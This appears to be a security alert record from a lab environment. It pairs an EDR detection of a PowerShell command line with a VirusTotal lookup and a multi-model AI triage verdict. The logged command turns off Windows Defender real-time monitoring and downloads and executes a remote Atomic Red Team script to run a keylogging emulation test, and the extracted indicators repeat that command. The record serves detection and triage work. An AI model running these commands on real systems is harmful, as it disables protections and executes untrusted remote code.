{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Tampering",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 193449984,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld6D5F.tmp.bat T1056.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4567040,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 2440,
        "THIS_ATOM": "0c13305cb3f73d15515e789969c2a835",
        "THREADS": 3,
        "TIMESTAMP": 1774364725358,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 2440,
      "PROCESS_ID": 3164,
      "THREADS": 32,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "421a9c48-037c-4e7b-8016-81c0d6083fd0",
      "event_time": 1774364726507,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3164,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "0c13305cb3f73d15515e789969c2a835",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "6b593eddb775332b5050941f69c2a838"
    }
  },
  "detect_id": "50130158-001d-431c-8861-a29e69c2a839",
  "gen_time": 1774364729672,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364726\u0026selected=6b593eddb775332b5050941f69c2a838",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "421a9c48-037c-4e7b-8016-81c0d6083fd0",
    "event_time": 1774364726507,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3164,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "0c13305cb3f73d15515e789969c2a835",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "6b593eddb775332b5050941f69c2a838"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364729000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.875,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned by this parent process?",
    "Were there any network connections established during execution?",
    "Is there evidence of credential dumping or lateral movement attempts?",
    "Has this host been previously compromised?"
  ],
  "ioc_analysis": "The process is running legitimate Windows binaries but executing highly suspicious commands including disabling antivirus, downloading scripts from raw.githubusercontent.com, and invoking Atomic Red Team testing frameworks. These actions align with known adversary TTPs for evasion and reconnaissance.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)",
    "Install-AtomicRedTeam -Force -getAtomics",
    "Invoke-AtomicTest T1056.001"
  ],
  "mitre_techniques": [
    "T1056.001",
    "T1078.003",
    "T1565.002"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host immediately to prevent lateral movement",
    "Block outbound connections to raw.githubusercontent.com at the network perimeter",
    "Review all recent PowerShell execution logs for similar patterns",
    "Check for persistence mechanisms in startup locations",
    "Collect memory dump for forensic analysis"
  ],
  "risk_score": 88,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of Atomic Red Team (ART) tools via PowerShell under SYSTEM privileges. The command line explicitly disables real-time monitoring and downloads/installs ART modules from an external GitHub repository.\n\n**IOC Analysis:** The process is running legitimate Windows binaries but executing highly suspicious commands including disabling antivirus, downloading scripts from raw.githubusercontent.com, and invoking Atomic Red Team testing frameworks. These actions align with known adversary TTPs for evasion and reconnaissance.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.8\nThe detection involves a PowerShell process running from the legitimate System32 directory with a suspicious command line that disables real-time monitoring and performs actions typical of malware, such as installing package providers and invoking Atomic Red Team tests. Despite the file being signed and in a known-good location, the behavior raises concerns.\n\n**IOC Analysis:** The FILE_PATH C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is a legitimate Windows binary, and the HASH matches a known Microsoft-signed PowerShell.exe. However, the COMMAND_LINE includes commands to disable real-time monitoring and install potentially malicious tools, indicating malicious intent despite the benign file. The PARENT_PROCESS is cmd.exe from System32, which could be legitimate but is often used in malicious scripts.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 80% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.8,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}